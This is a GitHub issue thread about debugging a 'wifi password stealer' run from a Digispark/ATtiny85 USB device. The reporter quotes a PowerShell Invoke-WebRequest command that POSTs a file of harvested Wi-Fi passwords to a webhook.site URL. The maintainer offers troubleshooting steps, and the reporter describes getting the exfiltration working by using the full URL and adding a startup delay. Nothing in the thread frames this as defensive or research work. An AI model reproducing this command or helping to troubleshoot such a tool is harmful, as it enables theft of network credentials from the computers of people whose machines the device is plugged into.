### ISSUE TITLE
Not finding File

### ISSUE THREAD

**Issue by Dasor** [MTK911/Attiny85#8]
So when I run the wifi password stealer all goes fine and creates several files with the password but when: powershell Invoke-WebRequest -Uri https://webhook.site/<> -Method POST -InFile Wi-Fi-PASS runs it says that there aren´t any files. ¿any ideas why this is happening?

**Comment by MTK911** [comment]
Hello Dasor,
1_ Share name of the files being created when first execution is completed.
2_ Make sure you have added your webhook.site URL in the script as mentioned.
3_ Try #7 solution it might help you

I have locked the thread so you can share your WiFi file names for privacy concerns.

**Comment by Dasor** [comment]
So I Made it work in a really weird way (I'm new to this so sorry if nothing of this makes sense). So I tried coping your code on #7 and what happen is that it didn't even boot (digispark I mean) so after some tries what I did was doing some crtl+z until I had my previous code. It kept giving me the same error so I tried something randomly. I change the <> from the line and just used the normal url and it worked (also had to put a 5 sec delay in the void setup). 

Well sir thank you for your help and I hope my info was useful as I said I'm pretty new to this world of computer programming so maybe this makes no sense, but I'm just adding my code file here because it can maybe help you. (I deleted my personal webhook.site url)
[script.txt](https://github.com/MTK911/Attiny85/files/6014619/script.txt)


)
